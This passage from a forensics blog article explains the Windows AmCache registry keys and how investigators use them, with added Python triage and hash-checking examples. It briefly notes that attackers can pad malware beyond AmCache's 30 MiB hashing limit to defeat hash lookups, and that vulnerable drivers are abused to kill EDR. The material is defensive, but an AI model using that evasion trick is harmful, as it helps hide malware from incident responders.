through Registry Explorer</p></div>
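<p>As an added example (not part of this article or of AmCache-EvilHunter), the following triages the dictionaries the parser above prints with three constructed rules: an empty Publisher, a non-OS binary under a user-writable or staging directory, and an on-disk name that differs from OriginalFileName. Value names are matched case-insensitively, so the FileId/FileID spelling does not matter. The sample records and their hashes are constructed; the ProgramData path is borrowed from the IoC list of the DLL hijacking article earlier in this feed.</p>

```python
"""Added example: triage InventoryApplicationFile records with a few constructed
rules. Not the article's tool; records and hashes below are synthetic."""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Constructed list of directory fragments where droppers and staged tools often land.
STAGING_HINTS = (
    "\\programdata\\", "\\appdata\\local\\temp\\", "\\windows\\temp\\",
    "\\users\\public\\", "\\recycler.bin\\", "\\$recycle.bin\\",
)


@dataclass
class Finding:
    path: str
    sha1: str
    reasons: List[str]


def triage_record(record: Dict[str, object]) -> Optional[Finding]:
    """Apply the rules to one record (value name -> value, as the parser prints it)."""
    r = {k.lower(): v for k, v in record.items()}      # tolerate FileId vs FileID
    path = str(r.get("lowercaselongpath") or "").lower()
    reasons: List[str] = []

    # Rule 1: malware rarely carries a Publisher in its version resource.
    if not str(r.get("publisher") or "").strip():
        reasons.append("no Publisher in the version resource")

    # Rule 2: a non-OS binary sitting in a user-writable or staging directory.
    is_os = bool(int(r.get("isoscomponent") or 0))
    if not is_os and any(h in path for h in STAGING_HINTS):
        reasons.append("non-OS binary in a user-writable or staging directory")

    # Rule 3 (weak signal): the file was renamed after it was built.
    name = str(r.get("name") or "").lower()
    orig = str(r.get("originalfilename") or "").lower()
    if name and orig and name != orig:
        reasons.append(f"on-disk name {name} differs from OriginalFileName {orig}")

    if not reasons:
        return None
    file_id = str(r.get("fileid") or "")
    sha1 = file_id[4:] if len(file_id) == 44 else file_id  # drop the "0000" prefix
    return Finding(path, sha1, reasons)


def triage(records: Iterable[Dict[str, object]]) -> List[Finding]:
    """Findings sorted so the records with the most hits come first."""
    findings = [f for f in map(triage_record, records) if f is not None]
    findings.sort(key=lambda f: len(f.reasons), reverse=True)
    return findings


# Constructed records; FileId values are placeholders, not real file hashes.
SAMPLE_RECORDS = [
    {"LowerCaseLongPath": r"c:\windows\system32\notepad.exe", "Name": "notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE", "Publisher": "microsoft corporation",
     "IsOsComponent": 1, "FileId": "0000" + "1" * 40, "Size": 201216},
    {"LowerCaseLongPath": r"c:\program files\7-zip\7z.exe", "Name": "7z.exe",
     "OriginalFileName": "7z.exe", "Publisher": "igor pavlov",
     "IsOsComponent": 0, "FileId": "0000" + "2" * 40, "Size": 561152},
    {"LowerCaseLongPath": r"c:\programdata\systemsettings.exe", "Name": "systemsettings.exe",
     "OriginalFileName": "", "Publisher": "",
     "IsOsComponent": 0, "FileId": "0000" + "3" * 40, "Size": 90112},
    {"LowerCaseLongPath": r"c:\users\bob\appdata\local\temp\update.exe", "Name": "update.exe",
     "OriginalFileName": "locker.exe", "Publisher": "",
     "IsOsComponent": 0, "FileId": "0000" + "4" * 40, "Size": 1433600},
]


if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f.sha1, f.path)
        for reason in f.reasons:
            print("   -", reason)
```

Feed the list produced by the parser above straight into <code>triage()</code>; the SHA-1 it returns for each finding is ready for a hash lookup, subject to the size caveat discussed next.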
1511. <p>As mentioned before, AmCache computes the SHA-1 hash over only the first 31,457,280 bytes (≈31 MB). To confirm this, we ran a small experiment with one binary smaller than 31 MB (Aralez) and one larger than that (a custom build of Velociraptor). In the first case, the SHA-1 hash of the entire binary was stored in AmCache.</p>
  1512. <div id="attachment_117627" style="width: 1720px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117627" class="size-full wp-image-117627" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4.png" alt="First AmCache SHA-1 storage scenario" width="1710" height="561" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4.png 1710w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4-300x98.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4-1024x336.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4-768x252.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4-1536x504.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4-1067x350.png 1067w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4-740x243.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4-853x280.png 853w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164055/amcache-forensic-artifact4-800x262.png 800w" sizes="auto, (max-width: 1710px) 100vw, 1710px" /></a><p id="caption-attachment-117627" class="wp-caption-text">First AmCache SHA-1 storage scenario</p></div>
  1513. <p>For the second scenario, we used the dd utility to extract the first 31 MB of the Velociraptor binary:</p>
  1514. <div id="attachment_117628" style="width: 1566px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117628" class="size-full wp-image-117628" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5.png" alt="Stripped binary" width="1556" height="375" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5.png 1556w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5-300x72.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5-1024x247.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5-768x185.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5-1536x370.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5-1452x350.png 1452w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5-740x178.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5-1162x280.png 1162w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164152/amcache-forensic-artifact5-800x193.png 800w" sizes="auto, (max-width: 1556px) 100vw, 1556px" /></a><p id="caption-attachment-117628" class="wp-caption-text">Stripped binary</p></div>
  1515. <p>When checking the Velociraptor entry in AmCache, we found that it indeed stored the SHA-1 hash calculated only over the first 31,457,280 bytes of the binary. Interestingly enough, the Size value still represented the actual size of the original file. Thus, relying only on the file hash stored in AmCache when querying threat intelligence portals may not be enough when dealing with large files: before searching such portals, check whether the file size in the record is bigger than 31,457,280 bytes.</p>
  1516. <div id="attachment_117629" style="width: 1720px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117629" class="size-full wp-image-117629" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6.png" alt="Second AmCache SHA-1 storage scenario" width="1710" height="552" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6.png 1710w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6-300x97.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6-1024x331.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6-768x248.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6-1536x496.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6-1084x350.png 1084w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6-740x239.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6-867x280.png 867w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164250/amcache-forensic-artifact6-800x258.png 800w" sizes="auto, (max-width: 1710px) 100vw, 1710px" /></a><p id="caption-attachment-117629" class="wp-caption-text">Second AmCache SHA-1 storage scenario</p></div>
  1517. <p>Additionally, attackers may take advantage of this characteristic to purposely generate large malicious binaries. In this way, even if investigators find that malware was executed or present on a Windows system, the actual SHA-1 hash of the binary will still be unknown, making it difficult to track it across the network and to retrieve it from public databases like VirusTotal.</p>
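To make the caveat concrete, here is an added example (not code from the article or from AmCache-EvilHunter) that reproduces the truncated hashing on a constructed 32 MiB buffer and flags records whose Size exceeds the limit. It assumes a record dictionary with a FileId field (SHA-1 with four leading zeroes, as described for FileID in the driver section of this article) and a Size field.

```python
import hashlib

# Per the observation above: AmCache hashes only the first 31,457,280 bytes
# (30 MiB) of a file, while Size still records the real file size.
AMCACHE_HASH_LIMIT = 31_457_280


def amcache_style_sha1(data: bytes) -> str:
    """SHA-1 as AmCache records it: over at most the first 31,457,280 bytes."""
    return hashlib.sha1(data[:AMCACHE_HASH_LIMIT]).hexdigest()


def normalize_file_id(file_id: str) -> str:
    """Drop the four leading zeroes AmCache prepends to the SHA-1 in FileId."""
    file_id = file_id.strip().lower()
    if len(file_id) == 44 and file_id.startswith("0000"):
        return file_id[4:]
    return file_id


def triage_record(record: dict) -> dict:
    """Say whether the hash in an AmCache record is safe to use for TI lookups.

    `record` carries the two fields relied on here (assumed names): FileId and Size.
    """
    size = int(record["Size"])
    partial = size > AMCACHE_HASH_LIMIT
    return {
        "sha1": normalize_file_id(record["FileId"]),
        "size": size,
        "hash_is_partial": partial,
        # A prefix hash will not match the full file's hash on OpenTIP/VT;
        # recover the file and hash it fully instead of trusting the record.
        "lookup_reliable": not partial,
    }


def record_matches_file(record: dict, data: bytes) -> bool:
    """Confirm a recovered file is the one AmCache saw, even when the record
    holds only a prefix hash: recompute the hash the same truncated way and
    require the recorded Size to match the real length."""
    return (len(data) == int(record["Size"])
            and normalize_file_id(record["FileId"]) == amcache_style_sha1(data))


def demo() -> dict:
    # Constructed samples: a 32 MiB pseudo-binary above the hashing limit and
    # a 256 KiB one below it (not real files).
    big = (bytes(range(256)) * 4096) * 32          # 1 MiB * 32
    small = bytes(range(256)) * 1024               # 256 KiB
    big_record = {"FileId": "0000" + amcache_style_sha1(big), "Size": len(big)}
    small_record = {"FileId": "0000" + amcache_style_sha1(small), "Size": len(small)}
    return {
        "big_full_sha1": hashlib.sha1(big).hexdigest(),
        "big_recorded_sha1": normalize_file_id(big_record["FileId"]),
        "big_triage": triage_record(big_record),
        "big_matches": record_matches_file(big_record, big),
        "small_full_sha1": hashlib.sha1(small).hexdigest(),
        "small_triage": triage_record(small_record),
        "small_matches": record_matches_file(small_record, small),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

For the large sample the recorded hash differs from the full-file SHA-1, so only the triage flag tells the analyst that a portal lookup on it is not meaningful.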
  1518. <h4 id="inventoryapplicationfile-use-case-example-finding-a-deleted-tool-that-was-used">InventoryApplicationFile – use case example: finding a deleted tool that was used</h4>
  1519. <p>Let&#8217;s suppose you are searching for a possible insider threat. The user denies having run any suspicious programs, and any suspicious software was securely erased from disk. But in the InventoryApplicationFile, you find a record of winscp.exe being present in the user&#8217;s Downloads folder. Even though the file is gone, this tells you the tool was on the machine and it was likely used to transfer files before being deleted. In our incident response practice, we have seen similar cases, where this key proved useful.</p>
  1520. <h3 id="inventoryapplication">InventoryApplication</h3>
  1521. <p>The <code>InventoryApplication</code> key records details about applications that were previously installed on the system. Unlike <code>InventoryApplicationFile</code>, which logs every executable encountered, <code>InventoryApplication</code> focuses on those with installation records. Each entry is named by its unique ProgramId, allowing straightforward linkage back to the corresponding InventoryApplicationFile key. Additionally, <code>InventoryApplication</code> has the following subkeys of interest:</p>
  1522. <ul>
  1523. <li><strong>InstallDate:</strong> a date‑time string indicating when the OS first recorded or recognized the application</li>
  1524. <li><strong>MsiInstallDate:</strong> present only if installed via Windows Installer (MSI); shows the exact time the MSI package was applied, sourced directly from the MSI metadata</li>
  1525. <li><strong>UninstallString:</strong> the exact command line used to remove the application</li>
  1526. <li><strong>Language:</strong> numeric locale identifier set by the developer (LCID)</li>
  1527. <li><strong>Publisher:</strong> the name of the software publisher or vendor</li>
  1528. <li><strong>ManifestPath:</strong> the file path to the installation manifest used by UWP or AppX/MSIX apps</li>
  1529. </ul>
  1530. <p>With a simple change to our parser, we can check the data contained in this key:</p><pre class="urvanov-syntax-highlighter-plain-tag">&lt;...&gt;
  1531. parent = subs.get("InventoryApplication")
  1532. &lt;...&gt;</pre><p>
  1533. <div id="attachment_117630" style="width: 1355px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117630" class="size-full wp-image-117630" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7.png" alt="InventoryApplication subkeys" width="1345" height="345" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7.png 1345w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7-300x77.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7-1024x263.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7-768x197.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7-740x190.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7-1092x280.png 1092w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165005/amcache-forensic-artifact7-800x205.png 800w" sizes="auto, (max-width: 1345px) 100vw, 1345px" /></a><p id="caption-attachment-117630" class="wp-caption-text">InventoryApplication subkeys</p></div>
  1534. <p>When a <code>ProgramId</code> appears both here and under <code>InventoryApplicationFile</code>, it confirms that the executable is not merely present or executed, but was formally installed. This distinction helps us separate ad-hoc copies or transient executions from installed software. The following figure shows the <code>ProgramId</code> of the WinRAR software under <code>InventoryApplicationFile</code>.</p>
  1535. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117631" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8.png" alt="" width="1434" height="480" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8.png 1434w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8-300x100.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8-1024x343.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8-768x257.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8-1046x350.png 1046w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8-740x248.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8-837x280.png 837w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165157/amcache-forensic-artifact8-800x268.png 800w" sizes="auto, (max-width: 1434px) 100vw, 1434px" /></a></p>
  1536. <p>When searching for the <code>ProgramId</code>, we find an exact match under <code>InventoryApplication</code>. This confirms that WinRAR was indeed installed on the system.</p>
  1537. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117632" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9.png" alt="" width="1435" height="421" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9.png 1435w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9-300x88.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9-1024x300.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9-768x225.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9-1193x350.png 1193w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9-740x217.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9-954x280.png 954w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165257/amcache-forensic-artifact9-800x235.png 800w" sizes="auto, (max-width: 1435px) 100vw, 1435px" /></a></p>
  1538. <p>Another interesting detail about <code>InventoryApplication</code> is that it contains a subkey named <code>LastScanTime</code>, which is stored separately from <code>ProgramIds</code> and holds a value representing the last time the Microsoft Compatibility Appraiser ran. This is a scheduled task that launches the <code>compattelrunner.exe</code> binary, and the information in this key should only be updated when that task executes. As a result, software installed since the last run of the Appraiser may not appear here. The <code>LastScanTime</code> value is stored in <strong>Windows FileTime</strong> format.</p>
  1539. <div id="attachment_117633" style="width: 888px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165538/amcache-forensic-artifact10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117633" class="size-full wp-image-117633" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165538/amcache-forensic-artifact10.png" alt="InventoryApplication LastScanTime information" width="878" height="118" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165538/amcache-forensic-artifact10.png 878w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165538/amcache-forensic-artifact10-300x40.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165538/amcache-forensic-artifact10-768x103.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165538/amcache-forensic-artifact10-740x99.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165538/amcache-forensic-artifact10-800x108.png 800w" sizes="auto, (max-width: 878px) 100vw, 878px" /></a><p id="caption-attachment-117633" class="wp-caption-text">InventoryApplication LastScanTime information</p></div>
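An added example (not code from the article) that decodes LastScanTime from Windows FILETIME and sorts a set of install timestamps into those the last Appraiser run could have captured and those that post-date it, which is the gap described above. The event labels and timestamps are constructed.

```python
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime: int) -> datetime:
    """Decode a Windows FILETIME: 100-ns ticks since 1601-01-01 00:00 UTC."""
    if filetime < 0:
        raise ValueError("FILETIME is an unsigned 64-bit value")
    # timedelta only carries microseconds, so the last digit of the tick count is dropped.
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse of filetime_to_datetime (microsecond precision)."""
    delta = dt.astimezone(timezone.utc) - FILETIME_EPOCH
    return (delta.days * 86_400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def classify_by_last_scan(last_scan_filetime: int, events: dict) -> dict:
    """Split install events into those the Appraiser run at LastScanTime could
    have inventoried and those that happened afterwards and may be missing
    from InventoryApplication. `events` maps a label to an ISO-8601 timestamp."""
    last_scan = filetime_to_datetime(last_scan_filetime)
    covered, not_covered = {}, {}
    for label, iso in events.items():
        when = datetime.fromisoformat(iso)
        if when.tzinfo is None:          # treat naive timestamps as UTC
            when = when.replace(tzinfo=timezone.utc)
        (covered if when <= last_scan else not_covered)[label] = iso
    return {"last_scan": last_scan.isoformat(),
            "covered": covered, "not_covered": not_covered}


def demo() -> dict:
    # Constructed LastScanTime: 2025-06-19 00:00:00 UTC expressed as FILETIME.
    last_scan = 133_947_648_000_000_000
    # Constructed install events, e.g. from MsiInstallDate or event logs.
    events = {
        "archiver_installed": "2025-06-18T14:05:00+00:00",
        "remote_access_tool_installed": "2025-06-20T09:30:00+00:00",
    }
    return classify_by_last_scan(last_scan, events)


if __name__ == "__main__":
    print(demo())
```

An application in the "not_covered" set can be absent from InventoryApplication without ever having been removed, so its absence is not evidence in either direction.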
  1540. <h4 id="inventoryapplication-use-case-example-spotting-remote-access-software">InventoryApplication – use case example: spotting remote access software</h4>
  1541. <p>Suppose that during an incident response engagement, you find an entry for AnyDesk in the InventoryApplication key (although the application is not installed anymore). This means that the attacker likely used it for remote access and then removed it to cover their tracks. Even if wiped from disk, this key proves it was present. We have seen this scenario in real-world cases more than once.</p>
  1542. <h3 id="inventorydriverbinary">InventoryDriverBinary</h3>
  1543. <p>The <code>InventoryDriverBinary</code> key records every kernel-mode driver that the system has loaded, providing the essential metadata needed to spot suspicious or malicious drivers. Under this key, each driver is captured in its own uniquely named subkey and includes:</p>
  1544. <ul>
  1545. <li><strong>FileID</strong>: the SHA-1 hash of the driver binary, with four zeroes prepended to the hash</li>
  1546. <li><strong>LowerCaseLongPath</strong>: the full lowercase file path to the driver on disk</li>
  1547. <li><strong>DigitalSignature</strong>: the code-signing certificate details. A valid, trusted signature helps confirm the driver&#8217;s authenticity</li>
  1548. <li><strong>LastModified</strong>: the file&#8217;s last modification timestamp from the filesystem metadata, revealing when the driver binary was most recently altered on disk</li>
  1549. </ul>
  1550. <p>Because Windows drivers run at the highest privilege level, they are frequently exploited by malware. For example, a previous study conducted by Kaspersky shows that attackers are <a href="https://securelist.com/av-killer-exploiting-throttlestop-sys/117026/" target="_blank" rel="noopener">exploiting vulnerable drivers for killing EDR processes</a>. When dealing with a cybersecurity incident, investigators correlate each driver&#8217;s cryptographic hash, file path, signature status, and modification timestamp. That can help in verifying if the binary matches a known, signed version, detecting any tampering by spotting unexpected modification dates, and flagging unsigned or anomalously named drivers for deeper analysis. Projects like <a href="https://www.loldrivers.io/" target="_blank" rel="noopener">LOLDrivers</a> help identify vulnerable drivers in use by attackers in the wild.</p>
  1551. <div id="attachment_117634" style="width: 1460px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117634" class="size-full wp-image-117634" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11.png" alt="InventoryDriverBinary inspection" width="1450" height="533" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11.png 1450w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11-300x110.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11-1024x376.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11-768x282.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11-952x350.png 952w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11-740x272.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11-762x280.png 762w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30165732/amcache-forensic-artifact11-800x294.png 800w" sizes="auto, (max-width: 1450px) 100vw, 1450px" /></a><p id="caption-attachment-117634" class="wp-caption-text">InventoryDriverBinary inspection</p></div>
  1552. <p>In addition to the <code>InventoryDriverBinary</code>, AmCache also provides the <code>InventoryApplicationDriver</code> key, which keeps track of all drivers that have been installed by specific applications. It includes two entries:</p>
  1553. <ul>
  1554. <li><strong>DriverServiceName</strong>, which identifies the name of the service linked to the installed driver; and</li>
  1555. <li><strong>ProgramIds</strong>, which lists the program identifiers (corresponding to the key names under <code>InventoryApplication</code>) that were responsible for installing the driver.</li>
  1556. </ul>
  1557. <p>As shown in the figure below, the <code>ProgramIds</code> key can be used to track the associated program that uses this driver:</p>
  1558. <div id="attachment_117635" style="width: 1565px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117635" class="size-full wp-image-117635" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12.png" alt="Checking program information by ProgramIds" width="1555" height="894" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12.png 1555w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12-300x172.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12-1024x589.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12-768x442.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12-1536x883.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12-609x350.png 609w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12-740x425.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12-487x280.png 487w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170026/amcache-forensic-artifact12-800x460.png 800w" sizes="auto, (max-width: 1555px) 100vw, 1555px" /></a><p id="caption-attachment-117635" class="wp-caption-text">Checking program information by ProgramIds</p></div>
  1559. <h4 id="inventorydriverbinary-use-case-example-catching-a-bad-driver">InventoryDriverBinary – use case example: catching a bad driver</h4>
  1560. <p>If the system was compromised through the abuse of a known vulnerable or malicious driver, you can use the <code>InventoryDriverBinary</code> registry key to confirm its presence. Even if the driver has been removed or hidden, remnants in this key can reveal that it was once loaded, which helps identify kernel-level compromises and supports timeline reconstruction during the investigation. This is exactly how the <a href="https://securelist.com/av-killer-exploiting-throttlestop-sys/117026/" target="_blank" rel="noopener">AV Killer malware</a> was discovered.</p>
  1561. <h3 id="inventoryapplicationshortcut">InventoryApplicationShortcut</h3>
  1562. <p>This key contains entries for <code>.lnk</code> (shortcut) files that were present in folders like each user&#8217;s Start Menu or Desktop. Within each shortcut key, the <code>ShortcutPath</code> provides the absolute path to the LNK file at the moment of discovery. The <code>ShortcutTargetPath</code> shows where the shortcut pointed. We can also search for the <code>ProgramId</code> entry within the <code>InventoryApplication</code> key using the <code>ShortcutProgramId</code> (similar to what we did for drivers).</p>
  1563. <div id="attachment_117636" style="width: 1596px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117636" class="size-full wp-image-117636" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13.png" alt="InventoryApplicationShortcut key" width="1586" height="306" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13.png 1586w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13-300x58.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13-1024x198.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13-768x148.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13-1536x296.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13-740x143.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30170311/amcache-forensic-artifact13-1451x280.png 1451w, 